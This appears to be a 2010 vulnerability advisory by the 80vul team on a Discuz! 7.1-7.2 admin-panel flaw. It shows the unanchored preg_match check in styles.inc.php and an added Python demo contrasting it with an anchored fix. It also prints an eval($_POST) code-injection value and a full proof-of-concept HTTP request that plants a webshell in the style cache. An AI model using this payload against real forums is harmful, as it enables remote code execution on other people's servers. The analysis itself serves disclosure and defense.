[Original] Revealed: Discuz! high-risk vulnerability
(2010-01-10 20:21:21)
Discuz! admin\styles.inc.php get-webshell bug
author: ring04h
team: http://www.80vul.com
Because the preg_match() regular-expression check on the $newcvar variable in Discuz!'s admin\styles.inc.php is not strict enough, the value can be used to execute code.
1. Analysis
In the file admin\styles.inc.php the code reads:
    if($newcvar && $newcsubst) {
        if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
            cpmsg('styles_edit_variable_duplicate', '', 'error');
        // the pattern is not anchored, so it succeeds if it matches anywhere in $newcvar
        } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
            cpmsg('styles_edit_variable_illegal', '', 'error');
        }
        $newcvar = strtolower($newcvar);
        $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute) VALUES ('$id', '$newcvar', '$newcsubst')");
    }
From the code above it can be seen that, with admin-panel privileges, one can go to Edit Style and insert !','80VUL');eval($_POST[RING]);// as a custom template variable name, with exp by ring04h! as its substitution; the value is written into the style cache file, giving a remote webshell that executes code.
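The defect is that the preg_match() pattern carries no anchors, so it succeeds whenever the value contains even one identifier character (the letters in 80VUL are enough for the string above). The following Python re-implementation of the check is an added example, not code from Discuz! or from the advisory: it runs the unanchored pattern and an anchored version over constructed sample names to show which inputs each accepts (flawed_check, hardened_check, audit and the samples are this example's own names).

```python
import re

# The character classes from admin/styles.inc.php, unchanged.
IDENT = r"[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*"

# Constructed sample inputs: name -> whether a template variable name
# with that value should be accepted.
SAMPLES = {
    "bgcolor": True,
    "font_size_2": True,
    "1abc": False,                               # identifiers may not start with a digit
    "": False,
    "!','80vul');eval($_post[ring]);//": False,  # the value from the advisory above
}


def flawed_check(name: str) -> bool:
    """Mirror of the original: preg_match() without anchors succeeds if the
    pattern matches *anywhere* in the value, so one letter is enough."""
    return re.search(IDENT, name) is not None


def hardened_check(name: str) -> bool:
    """Anchored version: the whole value must be a single identifier
    (the PCRE equivalent is wrapping the pattern in \\A ... \\z)."""
    return re.fullmatch(IDENT, name) is not None


def audit(samples=SAMPLES):
    """Return the inputs the flawed check wrongly accepts, and whether the
    anchored check gives the expected verdict for every sample."""
    wrongly_accepted = [n for n, ok in samples.items() if flawed_check(n) and not ok]
    hardened_correct = all(hardened_check(n) == ok for n, ok in samples.items())
    return wrongly_accepted, hardened_correct


if __name__ == "__main__":
    bad, ok = audit()
    print("accepted by the unanchored check although invalid:", bad)
    print("anchored check agrees with every expected verdict:", ok)
```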
2. Exploitation
POC:
step1:
POST /bbs/admincp.php?action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, **
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1402
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB
webshell: http://www.80vul.com/bbs/forumdata/cache/style_6.php
3. Patch [fix]
The vulnerability has been reported; awaiting an official patch. (大璞不完)
[Related links]
Original link: http://www.80vul.com/dzvul/sodb/18/sodb-2009-02.txt
Discuz! 7.1-7.2